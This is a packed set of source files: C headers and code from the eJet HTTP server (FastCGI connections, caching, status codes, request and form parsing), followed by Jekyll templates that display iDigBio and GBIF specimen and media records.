}
int http_fcgicon_connect (void * vpcon)
{
FcgiCon * pcon = (FcgiCon *)vpcon;
int ret = 0;
if (!pcon) return -1;
for (pcon->retrytimes++ ; pcon->retrytimes < 3; pcon->retrytimes++) {
if (pcon->pdev) {
iodev_close(pcon->pdev);
pcon->pdev = NULL;
}
if (pcon->ready_timer) {
iotimer_stop(pcon->ready_timer);
pcon->ready_timer = NULL;
}
EnterCriticalSection(&pcon->rcvCS);
if (pcon->socktype == 0) {
pcon->pdev = eptcp_connect(pcon->pcore,
pcon->dstip, pcon->dstport,
NULL, 0,
(void *)pcon->conid, &ret,
http_fcgisrv_pump, pcon->srv);
} else {
#ifdef UNIX
/* open unix socket */
pcon->pdev = epusock_connect(pcon->pcore,
pcon->unixsock,
(void *)pcon->conid, &ret,
http_fcgisrv_pump, pcon->srv);
#endif
}
if (!pcon->pdev) {
LeaveCriticalSection(&pcon->rcvCS);
continue;
}
if (ret >= 0) { //connect successfully
LeaveCriticalSection(&pcon->rcvCS);
ret = http_fcgicon_connected(pcon);
if (ret < 0) continue;
} else {
pcon->snd_state = FCGI_CON_CONNECTING;
pcon->ready_timer = iotimer_start(pcon->pcore,
12 * 1000,
t_fcgi_srv_con_build,
(void *)pcon->conid,
http_fcgisrv_pump, pcon->srv);
LeaveCriticalSection(&pcon->rcvCS);
}
return 0;
}
if (pcon->socktype == 0)
tolog(1, "eJet - FastCGI Connect: failed to build TCP Connection to server '%s:%d'.\n",
pcon->dstip, pcon->dstport);
else
tolog(1, "eJet - FastCGI Connect: failed to build Unix Socket to server '%s'.\n",
pcon->unixsock);
if (pcon->pdev) {
iodev_close(pcon->pdev);
pcon->pdev = NULL;
}
if (pcon->ready_timer) {
iotimer_stop(pcon->ready_timer);
pcon->ready_timer = NULL;
}
pcon->snd_state = FCGI_CON_IDLE;
http_fcgicon_close(pcon);
return -100;
}
int http_fcgicon_connected (void * vpcon)
{
FcgiCon * pcon = (FcgiCon *)vpcon;
if (!pcon) return -1;
pcon->rcv_state = FCGI_CON_READY;
pcon->snd_state = FCGI_CON_SEND_READY;
if (pcon->ready_timer) {
iotimer_stop(pcon->ready_timer);
pcon->ready_timer = NULL;
}
time(&pcon->stamp);
pcon->life_timer = iotimer_start(pcon->pcore,
6 * 1000,
t_fcgi_srv_con_life,
(void *)pcon->conid,
http_fcgisrv_pump,
pcon->srv);
    /* send a pending request to the FastCGI server immediately after the connection is established */
if (arr_num(pcon->msg_list) > 0 || http_fcgisrv_msg_num(pcon->srv) > 0) {
http_fcgi_send(pcon);
}
return 0;
}
int http_fcgicon_reqnum (void * vcon)
{
FcgiCon * pcon = (FcgiCon *)vcon;
if (!pcon) return 0;
return pcon->reqnum;
}
ulong http_fcgicon_id (void * vcon)
{
FcgiCon * pcon = (FcgiCon *)vcon;
if (!pcon) return 0;
return pcon->conid;
}
void * http_fcgicon_device (void * vcon)
{
FcgiCon * pcon = (FcgiCon *)vcon;
if (!pcon) return NULL;
return pcon->pdev;
}
int http_fcgicon_msg_add (void * vcon, void * vmsg)
{
FcgiCon * pcon = (FcgiCon *)vcon;
FcgiMsg * msg = (FcgiMsg *)vmsg;
int i, num;
if (!pcon) return -1;
if (!msg) return -2;
EnterCriticalSection(&pcon->msglistCS);
msg->pcon = pcon;
msg->conid = pcon->conid;
num = arr_num(pcon->msg_list);
for (i = 0; i < num; i++) {
if (arr_value(pcon->msg_list, i) == msg) {
LeaveCriticalSection(&pcon->msglistCS);
return 0;
}
}
arr_push(pcon->msg_list, msg);
LeaveCriticalSection(&pcon->msglistCS);
return 0;
}
int http_fcgicon_msg_del (void * vcon, void * vmsg)
{
FcgiCon * pcon = (FcgiCon *)vcon;
FcgiMsg * msg = (FcgiMsg *)vmsg;
if (!pcon) return -1;
if (!msg) return -2;
EnterCriticalSection(&pcon->msglistCS);
arr_delete_ptr(pcon->msg_list, msg);
if (msg->pcon == pcon)
msg->pcon = NULL;
if (msg->conid == pcon->conid)
msg->conid = 0;
LeaveCriticalSection(&pcon->msglistCS);
return 0;
}
void * http_fcgicon_msg_first (void * vcon)
{
FcgiCon * pcon = (FcgiCon *)vcon;
FcgiMsg * msg = NULL;
if (!pcon) return NULL;
EnterCriticalSection(&pcon->msglistCS);
msg = arr_value(pcon->msg_list, 0);
LeaveCriticalSection(&pcon->msglistCS);
return msg;
}
void * http_fcgicon_msg_last (void * vcon)
{
FcgiCon * pcon = (FcgiCon *)vcon;
FcgiMsg * msg = NULL;
int num = 0;
if (!pcon) return NULL;
EnterCriticalSection(&pcon->msglistCS);
num = arr_num(pcon->msg_list);
if (num > 0)
msg = arr_value(pcon->msg_list, num - 1);
LeaveCriticalSection(&pcon->msglistCS);
return msg;
}
<|start_filename|>include/http_variable.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_VARIABLE_H_
#define _HTTP_VARIABLE_H_
#ifdef __cplusplus
extern "C" {
#endif
#define fldsizeof(type, field) sizeof(((type *)0)->field)
#define http_var_set(var, stname, field, vtype, uns, sttype) \
(var)->fieldpos = offsetof(stname, field); \
(var)->fldlenpos = 0; \
(var)->haslen = 0; \
(var)->valtype = vtype; \
(var)->unsign = uns; \
(var)->structtype = sttype
#define http_var_set2(var, stname, field, fldlen, vtype, uns, sttype) \
(var)->fieldpos = offsetof(stname, field); \
(var)->fldlenpos = offsetof(stname, fldlen); \
(var)->haslen = 1; \
(var)->valtype = vtype; \
(var)->unsign = uns; \
(var)->structtype = sttype
#define http_var_set3(var, vtype, sttype) \
(var)->fieldpos = 0; \
(var)->fldlenpos = 0; \
(var)->haslen = 0; \
(var)->valtype = vtype; \
(var)->unsign = 0; \
(var)->structtype = sttype
#define http_var_set4(var, stname, field, subst, subfld, vtype, uns, sttype) \
(var)->fieldpos = offsetof(stname, field); \
(var)->subfldpos = offsetof(subst, subfld); \
(var)->substruct= 1; \
(var)->haslen = 0; \
(var)->valtype = vtype; \
(var)->unsign = uns; \
(var)->structtype = sttype
#define http_var_set5(var, stname, field, subst, subfld, subfldlen, vtype, uns, sttype) \
(var)->fieldpos = offsetof(stname, field); \
(var)->subfldpos = offsetof(subst, subfld); \
(var)->subfldlenpos = offsetof(subst, subfldlen); \
(var)->substruct= 1; \
(var)->haslen = 1; \
(var)->valtype = vtype; \
(var)->unsign = uns; \
(var)->structtype = sttype
#define http_var_set6(var, stname, field, subfld, vtype, uns) \
(var)->fieldpos = offsetof(stname, field); \
(var)->subfldpos = offsetof(stname, subfld); \
(var)->valtype = vtype; \
(var)->condcheck = 1; \
(var)->unsign = uns;
#define http_var_global(var, fldname, vtype, uns, sttype) \
(var)->field = fldname; \
(var)->fldlenpos = 0; \
(var)->haslen = 0; \
(var)->valtype = vtype; \
(var)->unsign = uns; \
(var)->structtype = sttype
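/* Illustrative expansion (sketch; the field name is only an example of the pattern,
   consult http_var_init() for the real variable table):
       http_var_set(var, HTTPMsg, req_port, 2, 0, 0);
   expands to
       var->fieldpos   = offsetof(HTTPMsg, req_port);
       var->fldlenpos  = 0;  var->haslen = 0;
       var->valtype    = 2;  // 2 = int, per the valtype legend below
       var->unsign     = 0;  var->structtype = 0;  // 0 = HTTPMsg
*/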
typedef struct http_variable_s {
char varname[32];
void * field;
size_t fieldpos; //relative to HTTPMsg instance
size_t fldlenpos; //relative to HTTPMsg instance
size_t subfldpos;
size_t subfldlenpos;
/* 0-char 1-short 2-int 3-int64 4-char[] 5-char * 6-frame_p 7-array 8-function 9-pointer */
unsigned valtype : 4;
unsigned unsign : 1; //0-signed 1-unsigned
unsigned structtype : 4; //0-HTTPMsg 1-HTTPMgmt 2-HTTPLoc 3-global variable 4-other
unsigned haslen : 1; //0-ignore fldlenpos/subfldlenpos 1-in use of fldlenpos
unsigned substruct : 2; //0-no sub struct 1-sub struct
/* 1-request header 2-cookie 3-query 4-response header 5-datetime 6-date 7-time */
unsigned arraytype : 4;
unsigned condcheck : 1; //check HTTPMsg->msgtype == 1 ? first-var : second-var
} http_var_t, HTTPVar;
int http_var_init (void * vmgmt);
int http_var_free (void * vmgmt);
int http_var_value (void * vmsg, char * vname, char * buf, int len);
int http_var_copy (void * vmsg, char * vstr, int vlen, char * buf, int buflen,
ckstr_t * pmat, int matnum, char * lastvname, int lastvtype);
void http_var_print (void * vmsg, char * varn, int len);
int http_var_header_value (void * vmsg, int type, char * name, int namelen, char * buf, int len);
int http_var_cookie_value (void * vmsg, char * name, int namelen, char * buf, int len);
int http_var_query_value (void * vmsg, char * name, int namelen, char * buf, int len);
int http_var_datetime_value(void * vmsg, char * name, int namelen, char * buf, int len, int type);
typedef struct var_obj_s {
char * name;
int namelen;
char * value;
int valuelen;
uint8 valtype;
} var_obj_t;
void * var_obj_alloc();
void var_obj_free (void * vobj);
int var_obj_cmp_name (void * a, void * b);
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>include/http_cache.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_CACHE_H_
#define _HTTP_CACHE_H_
#ifdef __cplusplus
extern "C" {
#endif
/* The HTTP cache storage system consists of raw files and cache-information files.
   Raw files are the actual origin-server files cached in the web server's local storage.
   Each raw file is accompanied by a cache-information file, whose name is derived from
   the raw file name with a .cache extension. Every raw-file directory must contain a
   hidden cache directory in which all the cache-information files are stored. */
/* cache facilities:
Expires: Wed, 21 Oct 2020 07:28:00 GMT (Response Header)
Cache-Control: max-age=73202 (Response Header)
Cache-Control: public, max-age=73202 (Response Header)
Last-Modified: Mon, 18 Dec 2019 12:35:00 GMT (Response Header)
If-Modified-Since: Fri, 05 Jul 2019 02:14:23 GMT (Request Header)
ETag: 627Af087-27C8-32A9E7B10F (Response Header)
If-None-Match: 627Af087-27C8-32A9E7B10F (Request Header)
*/
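/* Illustrative revalidation exchange using the facilities listed above (sketch):
   the client replays the cached validators
       If-Modified-Since: Mon, 18 Dec 2019 12:35:00 GMT
       If-None-Match: 627Af087-27C8-32A9E7B10F
   and the origin answers 304 Not Modified when the resource is unchanged, so the
   cached raw file can be served; otherwise a 200 response refreshes the cache. */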
/* 96 bytes header of cache information file */
typedef struct cache_info_s {
CRITICAL_SECTION cacheCS;
char * cache_file;
char * cache_tmp;
char * info_file;
void * hinfo;
uint32 mimeid;
uint8 body_flag;
int header_length;
int64 body_length;
int64 body_rcvlen;
/* Cache-Control: max-age=0, private, must-revalidate
Cache-Control: max-age=7200, public
Cache-Control: no-cache */
uint8 directive; //0-max-age 1-no cache 2-no store
uint8 revalidate; //0-none 1-must-revalidate
    uint8 pubattr; //0-unknown 1-public 2-private(only browser cache)
time_t ctime;
time_t expire;
int maxage;
time_t mtime;
char etag[36];
FragPack * frag;
int count;
void * httpmgmt;
} CacheInfo;
void * cache_info_alloc ();
void cache_info_free (void * vcacinfo);
int cache_info_zero (void * vcacinfo);
int64 cache_info_body_length (void * vcacinfo);
int cache_info_read (void * vcacinfo);
int cache_info_write_meta (void * vcacinfo);
int cache_info_write_frag (void * vcacinfo);
int cache_info_write (void * vcacinfo);
int cache_info_add_frag (void * vcacinfo, int64 pos, int64 len, int complete);
int cache_info_verify (void * vcacinfo);
int http_request_cache_init (void * vmsg);
int http_response_cache_init (void * vmsg);
int http_request_in_cache (void * vmsg);
int http_proxy_cache_open (void * vmsg);
int http_proxy_cache_parse (void * vmsg, void * vclimsg, int * resend);
int http_proxy_cache_complete (void * vmsg);
int http_cache_response_header (void * vmsg, void * vcacinfo);
int http_cache_info_init (void * vmgmt);
int http_cache_info_clean (void * vmgmt);
void * cache_info_open (void * vmgmt, char * cacfile);
void * cache_info_create (void * vmgmt, char * cacfile, int64 fsize);
void cache_info_close (void * vcacinfo);
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>include/http_request.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_REQUEST_H_
#define _HTTP_REQUEST_H_
#include "http_header.h"
#ifdef __cplusplus
extern "C" {
#endif
/* cookie management */
int http_req_addcookie (void * vmsg, char * name, int namelen,
char * value, int valuelen);
int http_req_delallcookie (void * vmsg);
HeaderUnit * http_req_getcookie (void * vmsg, char * name, int namelen);
int http_req_parse_cookie (void * vmsg);
/* Request-Line = Method SP Request-URI SP HTTP-Version CRLF */
int http_req_reqline_decode (void * vmsg, char * pline, int linelen);
int http_req_reqline_encode (char * meth, int methlen, char * uri,
int urilen, char * ver, int verlen, frame_p frame);
int http_req_set_reqmeth (void * vmsg, char * meth, int methlen);
int http_req_set_absuri (void * vmsg);
int http_req_set_docuri (void * vmsg, char * puri, int urilen, int decode, int instbrk);
/* resolve the uri to break down into all fields */
int http_req_set_uri (void * vmsg, char * puri, int urilen, int decode);
int http_partial_parse (void * vmsg, void * vbgn, int len);
int http_req_parse_header (void * vmsg);
int http_req_verify (void * vmsg);
int http_req_encoding (void * vmsg, int encode);
int print_request (void * vmsg, FILE * fp);
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>src/http_status.c<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#include "adifall.ext"
#include "http_status.h"
#include "http_mgmt.h"
typedef struct status_code_ {
int httpcode;
char * desc;
} HTTPStatusCode;
static HTTPStatusCode g_httpstatuscode[] = {
{ 100, "Continue"},
{ 101, "Switching Protocols"},
{ 200, "OK, Success"},
{ 201, "Created"},
{ 202, "Accepted"},
{ 203, "Non-Authoritative Information"},
{ 204, "No Content"},
{ 205, "Reset Content"},
{ 206, "Partial Content"},
{ 300, "Multiple Choices"},
{ 301, "Moved Permanently"},
{ 302, "Moved temporarily"},
{ 303, "See Other"},
{ 304, "Not modified"},
{ 305, "Use Proxy"},
{ 306, "reserved"},
{ 307, "Temporary Redirect"},
{ 400, "Bad Request - server could not understand request"},
{ 401, "Unauthorized"},
{ 402, "Payment required"},
{ 403, "Forbidden - operation is understood but refused"},
{ 404, "Not Found"},
{ 405, "Method not allowed"},
{ 406, "Not Acceptable"},
{ 407, "Proxy Authentication required"},
{ 408, "Request Timeout"},
{ 409, "Conflict"},
{ 410, "Gone"},
{ 411, "Length Required"},
{ 412, "Precondition failed"},
{ 413, "Request entity too large"},
{ 414, "Request-URL too large"},
{ 415, "Unsupported media type"},
{ 416, "Requested Range Not Satisfiable"},
{ 417, "Expectation Failed"},
{ 500, "Internal Server Error"},
{ 501, "Not Implemented"},
{ 502, "Bad Gateway"},
{ 503, "Service Unavailable"},
{ 504, "Gateway Timeout"},
{ 505, "HTTP version not supported"}
};
static ulong http_status_hash_func (void * vkey)
{
int httpcode = 0;
ulong codeval = 0;
if (!vkey) return 0;
httpcode = *(int *)vkey;
if (httpcode < 100) {
} else if (httpcode < 500 && httpcode >= 100) {
codeval = (httpcode/100 - 1) * 10 + httpcode % 100;
} else if (httpcode >= 500) {
codeval = (httpcode/100 + 1) * 10 + httpcode % 100;
}
return codeval;
}
static int http_status_cmp_key (void * a, void * b)
{
HTTPStatusCode * scode = (HTTPStatusCode *)a;
int httpcode = *(int *)b;
return scode->httpcode - httpcode;
}
int http_status_init (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
HTTPStatusCode * scode = NULL;
int i, num = 0;
if (!mgmt) return -1;
if (!mgmt->status_table) {
mgmt->status_table = ht_new(80, http_status_cmp_key);
ht_set_hash_func (mgmt->status_table, http_status_hash_func);
}
num = sizeof(g_httpstatuscode)/sizeof(g_httpstatuscode[0]);
for (i=0; i<num; i++) {
scode = (HTTPStatusCode *)&g_httpstatuscode[i];
ht_set(mgmt->status_table, &scode->httpcode, scode);
}
tolog(1, "eJet - HTTP Status table init.\n");
return 0;
}
int http_status_cleanup (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
if (!mgmt) return -1;
ht_free(mgmt->status_table);
mgmt->status_table = NULL;
tolog(1, "eJet - HTTP Status table cleaned.\n");
return 0;
}
int http_get_status (void * vmgmt, char * status, int statuslen, char ** preason)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
HTTPStatusCode * scode = NULL;
int httpcode = 0;
int i = 0;
if (!mgmt) return -1;
if (!status || statuslen <= 0) return -2;
while(*status==' ' || *status=='\t') {status++; statuslen--;}
for(i=0; i<statuslen && isdigit(status[i]); i++) {
httpcode *= 10;
httpcode += status[i] - '0';
}
scode = (HTTPStatusCode *) ht_get(mgmt->status_table, &httpcode);
if (!scode) return -100;
if (preason) *preason = scode->desc;
return 0;
}
int http_get_status2 (void * vmgmt, int status, char ** preason)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
HTTPStatusCode * scode = NULL;
if (!mgmt) return -1;
scode = (HTTPStatusCode *) ht_get(mgmt->status_table, &status);
if (!scode) return -100;
if (preason) *preason = scode->desc;
return 0;
}
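/* Illustrative usage (sketch):
       char * reason = NULL;
       if (http_get_status2(mgmt, 404, &reason) == 0)
           ; // reason now points at "Not Found" from the static table above
   http_get_status() does the same starting from a textual status such as "404". */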
<|start_filename|>include/http_mgmt.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_MGMT_H_
#define _HTTP_MGMT_H_
#include "http_listen.h"
#ifdef __cplusplus
extern "C" {
#endif
/* HTTP module role definition */
#define HTTP_SERVER 0x01
#define HTTP_CLIENT 0x02
#define HTTP_PROXY 0x04
#define HTTP_GATEWAY 0x08
typedef int HTTPObjInit (void * httpmgmt, void * vobj, void * hconf);
typedef int HTTPObjClean (void * vobj);
extern char * g_http_version;
extern char * g_http_build;
extern char * g_http_author;
typedef struct http_mgmt_ {
char * uri_unescape_char; /* uri not escaped character list using percent encoding */
char * cookie_file;
int conn_check_interval;
int srv_check_interval;
int cli_max_header_size;
uint8 cli_body_cache;
int cli_body_cache_threshold;
int cli_keepalive_time; /* after one/more requests handled, keep connection */
int cli_conn_idle_time; /* connection accepted, but no request bytes recv */
int cli_header_idletime; /* after recv partial header, max time not got followed bytes */
int cli_header_time; /* max time got one complete header */
int cli_request_handle_time; /* max time request arrived and handled */
int srv_max_header_size;
int srv_connecting_time; /* max time that builds TCP connection to remote server */
int srv_keepalive_time; /* keep the connection alive waiting for the new httpmsg */
int srv_conn_idle_time; /* max time handling HTTPMsg, in sending or waiting resp */
char * srv_con_cert; /* cert needed when issuing HTTP request to origin over SSL con */
char * srv_con_prikey; /* private key needed when issuing HTTP request over SSL con */
char * srv_con_cacert; /* CA cert when client authentication needed */
char * srv_resp_root;
uint8 srv_resp_cache;
char * srv_resp_cache_file;
uint8 proxy_tunnel; /* when acting as proxy, CONNECT method is suported or not */
int tunnel_keepalive_time; /* max idle time there is no sending/receiving on the connection */
uint8 auto_redirect; /* 301/302 from origin is redirected or not by web server */
int proxy_buffer_size; /* max size of data piled up in sending buffer to client */
int fcgi_keepalive_time; /* FCGI TCP connection is kept alive waiting for new FcgiMsg */
int fcgi_connecting_time; /* allowed max time to build TCP connection to FCGI Server */
int fcgi_conn_idle_time; /* max time handling one FcgiMsg, in sending or waiting resp */
int fcgi_srv_alive_time; /* FCGI Server Instance is kept alive waiting for new FcgiCon */
int fcgi_buffer_size; /* max size of data piled up in sending buffer to client */
void * cnfjson;
char root_path[256];
char httpver0[12];
char httpver1[12];
int header_num;
char useragent[256];
uint32 uri_bitmask[8];
int addrnum;
AddrItem localaddr[6];
char uploadso[33];
char uploadvar[33];
char shellcmdso[33];
char shellcmdvar[33];
time_t inlaststamp;
char inipaddr[41];
void * variable;
int varnum;
int varsize;
hashtab_t * var_table;
void * source_proxy_mgmt;
void * host_proxy_mgmt;
void * httplog;
ulong conid;
CRITICAL_SECTION conCS;
hashtab_t * con_table;
ulong srvid;
CRITICAL_SECTION srvCS;
rbtree_t * srv_tree;
void * srv_sslctx;
ulong msgid;
CRITICAL_SECTION msgidCS;
int msgextsize;
CRITICAL_SECTION msgtableCS;
hashtab_t * msg_table;
CRITICAL_SECTION fcgisrvCS;
hashtab_t * fcgisrv_table;
void * cachemgmt;
void * cookiemgmt;
CRITICAL_SECTION cacinfoCS;
hashtab_t * cacinfo_table;
bpool_t * con_pool;
bpool_t * srv_pool;
bpool_t * msg_pool;
bpool_t * header_unit_pool;
bpool_t * frame_pool;
mpool_t * fcgisrv_pool;
mpool_t * fcgicon_pool;
mpool_t * fcgimsg_pool;
hashtab_t * status_table;
/* HTTPListen instances list */
CRITICAL_SECTION listenlistCS;
arr_t * listen_list;
/* matching next proxy host and port when sending request */
arr_t * sndpxy_list;
/* default MIME table */
void * mimemgmt;
uint8 mimemgmt_alloc;
void * appmime;
HTTPCBHandler * req_handler;
void * req_cbobj;
HTTPCBHandler * req_check;
void * req_checkobj;
HTTPCBHandler * res_check;
void * res_checkobj;
void * xmlmgmt;
void * pcore;
CRITICAL_SECTION countCS;
struct timeval count_tick;
uint64 total_recv;
uint64 total_sent;
/* reserved extra object for application */
HTTPObjInit * objinit;
void * hobjconf;
HTTPObjClean * objclean;
uint8 extdata[1];
} HTTPMgmt;
int http_mgmt_get_conf (void * vmgmt);
void * http_mgmt_alloc (void * epump, char * jsonconf, int extsize, int msgextsize);
int http_mgmt_init (void * vmgmt);
int http_mgmt_cleanup (void * vmgmt);
int http_mgmt_obj_init (void * vmgmt, HTTPObjInit * objinit, void * hconf);
int http_mgmt_obj_clean (void * vmgmt, HTTPObjClean * objclean);
void * http_mgmt_obj (void * vmgmt);
void http_overhead (void * vmgmt, uint64 * recv, uint64 * sent,
struct timeval * lasttick, int reset, struct timeval * curt);
void http_overhead_sent (void * vmgmt, long sent);
void http_overhead_recv (void * vmgmt, long recv);
int http_listen_check (void * vmgmt, void * vobj, int event, int fdtype);
void http_uri_escape_init (void * vmgmt);
int http_set_reqhandler (void * vmgmt, HTTPCBHandler * reqhandler, void * cbobj);
int http_set_reqcheck (void * vmgmt, HTTPCBHandler * reqcheck, void * checkobj);
int http_set_rescheck (void * vmgmt, HTTPCBHandler * rescheck, void * checkobj);
int http_mgmt_con_add (void * vmgmt, void * vcon);
void * http_mgmt_con_get (void * vmgmt, ulong conid);
void * http_mgmt_con_del (void * vmgmt, ulong conid);
int http_mgmt_con_num (void * vmgmt);
void * http_msg_fetch (void * vmgmt);
int http_msg_num (void * vmgmt);
void * http_get_json_conf (void * vmgmt);
void * http_get_mimemgmt (void * vmgmt);
void * http_get_frame_pool (void * vmgmt);
void * http_get_epump (void * vmgmt);
int http_set_epump (void * vmgmt, void * pcore);
char * http_get_mime (void * vmgmt, char * file, uint32 * mimeid);
int http_conf_mime_init (void * vmgmt);
int http_conf_mime_clean (void * vmgmt);
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>include/http_form.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_FORM_H_
#define _HTTP_FORM_H_
#ifdef __cplusplus
extern "C" {
#endif
typedef struct HTTPForm_ {
char * name; //allocated, need free
char * ctype; //allocated, need free
uint8 formtype; //0-form data 1-file
char * filename; //allocated, need free
char * basename; //allocated, need free
char * extname;
int64 valuepos;
int64 valuelen;
chunk_t * body_chunk;
uint8 filecache;
} HTTPForm, http_form_t;
void * http_form_alloc();
void http_form_free (void * vform);
void * http_form_node (void * vmsg, char * key);
int http_form_get (void * vmsg, char * key, char ** ctype, uint8 * formtype, char ** fname, int64 * valuelen);
int http_form_value (void * vmsg, char * key, char * value, int64 valuelen);
int http_form_valuep (void * vmsg, char * key, int64 pos, char ** pvalue, int64 * valuelen);
int http_form_tofile (void * vmsg, char * key, int filefd);
int http_form_multipart_parse (void * vmsg, arr_t * formlist);
typedef struct FormDataNode_ {
void * res[2];
char * pval; //Content-Disposition: form-data; name="TUploadFile"; filename="F:\tmp\onebyte.txt"
int valuelen;
char * pbody; //file content or form-var data
int bodylen;
int bodypos; //if filecache, gives the offset
char bodycont[512]; //if filecache, store the body content
char conttype[64]; // form data content type
int typelen;
uint8 filecache; //0-memory 1-file cache
char filecachename[128]; //multipart-form content file name
uint8 fileflag; //0-form data 1-file content
char var[128]; //variable name
char filename[128];
char basename[128];
char extname[32];
char path[128]; //httpdoc real path of the request file
} FormDataNode;
int ParseReqMultipartForm (void * vmsg, arr_t * formdatalist);
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>include/http_fcgi_io.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_FCGI_IO_H_
#define _HTTP_FCGI_IO_H_
#ifdef __cplusplus
extern "C" {
#endif
int http_fcgicon_crash_handle (void * vcon);
int http_fcgi_send_probe (void * vcon);
int http_fcgi_send (void * vcon);
int http_fcgi_send_final (void * vmsg);
int http_fcgi_recv (void * vcon);
int http_fcgi_recv_parse (void * vcon);
int http_fcgi_recv_forward (void * vcon);
int http_fcgi_handle (void * vmsg);
int http_fcgi_check (void * vmsg, void * purl, int urlen);
void * http_fcgi_send_start (void * vfcgisrv, void * vhttpmsg);
int http_fcgi_srv_send (void * vfcgicon, void * vfcgimsg);
int http_fcgi_con_lifecheck (void * vcon);
#ifdef __cplusplus
}
#endif
#endif
| kehengzhong/ejet |
<|start_filename|>_layouts/mediarecord.html<|end_filename|>
---
layout: default
---
<div class="mediarecord" style="display: flex">
{% assign mediarecord = page.idigbio %}
{% include media.html mediarecord=mediarecord %}
</div>
<|start_filename|>data.json<|end_filename|>
---
---
{%- assign records = site.pages -%}
{%- for page in records -%}
{% assign layout = page.layout %}
{%- case layout -%}
{%- when "occurrence" -%}
{{ page.gbif | jsonify | strip_newlines }}
{{ "" }}
{%- when "record" -%}
{{ page.idigbio | jsonify | strip_newlines }}
{{ "" }}
{%- when "mediarecord" -%}
{{ page.idigbio | jsonify | strip_newlines }}
{{ "" }}
{%- endcase -%}
{%- endfor -%}
<|start_filename|>_includes/media.html<|end_filename|>
<div style="display: flex; flex-direction: column; border: solid; border-style: top;">
Media Record
<div style="display: flex;">
<a href="{{ include.mediarecord.uuid }}">{%- include uuid.html url=site.url uuid=include.mediarecord.uuid -%}</a>
</div>
<div style="display: flex;">
<a href="{{ include.mediarecord.uuid | prepend: "https://www.idigbio.org/portal/mediarecords/" }}">{%- include uuid.html url="idigbio.org" uuid=include.mediarecord.uuid -%}</a>
</div>
<div style="display: flex; justify-content: space-evenly;">
<div>
{% assign fullsize_url_online = include.mediarecord.uuid | prepend: "https://api.idigbio.org/v2/media/" | append: "?size=fullsize" %}
{% include media_frag.html origin=fullsize_url_online %}
</div>
<div>
{% assign original_online = include.mediarecord.data["ac:accessURI"] %}
{% include media_frag.html origin=original_online %}
</div>
</div>
<div id="{{ include.mediarecord.data | jsonify | uri_escape }}" class="meta"></div>
</div>
<|start_filename|>_includes/record.html<|end_filename|>
<div style="display: flex; flex-direction: row; border: solid;">
<div style="display: flex; flex-direction: column; border: solid;">
<div>Specimen Record</div>
<div><a href="{{ include.record.idigbio.uuid }}">{%- include uuid.html url=site.url uuid=include.record.idigbio.uuid -%}</a></div>
<div>
<a href="{{ include.record.idigbio.uuid | prepend: "https://www.idigbio.org/portal/records/" }}">{%- include uuid.html url="idigbio.org" uuid=include.record.idigbio.uuid -%}</a>
</div>
<div id="{{ include.record.idigbio.data | jsonify | uri_escape }}" class="meta"></div>
</div>
<div>
{%- for uuid in include.record.idigbio.indexTerms.mediarecords -%}
{%- assign mediarecord = site.pages | where: "id", uuid | first -%}
{% include media.html mediarecord=mediarecord.idigbio %}
{%- endfor -%}
</div>
</div>
<|start_filename|>_includes/occurrence.html<|end_filename|>
<div style="display: flex; flex-direction: row; border: solid;">
<div style="display: flex; flex-direction: column; border: solid;">
<div>Occurrence</div>
<div><a href="{{ include.occurrence.gbif.key }}">{%- include key.html url=site.url key=include.occurrence.gbif.key -%}</a></div>
<div>
<a href="{{ include.occurrence.gbif.key | prepend: "https://www.gbif.org/occurrence/" }}">{%- include key.html url="gbif.org" key=include.occurrence.gbif.key -%}</a>
</div>
<div id="{{ include.occurrence.gbif | jsonify | uri_escape }}" class="meta"></div>
</div>
{%- assign media_gbif_list = include.occurrence.gbif.media | where: "type", "StillImage" -%}
{%- for media_gbif in media_gbif_list -%}
{% include media_gbif.html media_gbif=media_gbif %}
{%- endfor -%}
</div>
<|start_filename|>registry.json<|end_filename|>
---
---
{%- assign versions = site.data.content -%}
{%- for version in versions -%}
{{ version.url }}
{{ version | jsonify | strip_newlines }}
{%- endfor -%}
<|start_filename|>_includes/local_hash_for.html<|end_filename|>
{%- assign content_for_url = site.data.content | where: "url", include.url | first -%}
{%- include local_url_for_hash.html hash=content_for_url.hash location=site.data.preston.data_location -%}
<|start_filename|>_includes/local_url_for_hash.html<|end_filename|>
{%- assign hash = include.hash | remove: "hash://sha256/" -%}
{%- assign location = include.location | remove: "hash://sha256/" -%}
{%- assign hash_first2 = hash | slice: 0,2 -%}
{%- assign hash_second2 = hash | slice: 2,2 -%}
{%- assign local_url = hash | prepend: "/" | prepend: hash_second2 | prepend: "/" | prepend: hash_first2 | prepend: location %}
{{ local_url }}
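{%- comment -%}
Illustrative example (hypothetical values): with location "/data/" and
hash "hash://sha256/abcd1234...", this include renders "/data/ab/cd/abcd1234...",
i.e. the first two and the next two hex characters of the sha256 hash become
directory levels of the content-addressed store.
{%- endcomment -%}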
<|start_filename|>_includes/uuid.html<|end_filename|>
{%- assign hostname = include.url | split: "://" | reverse | first | split: "/" | first | split: ':' | first -%}
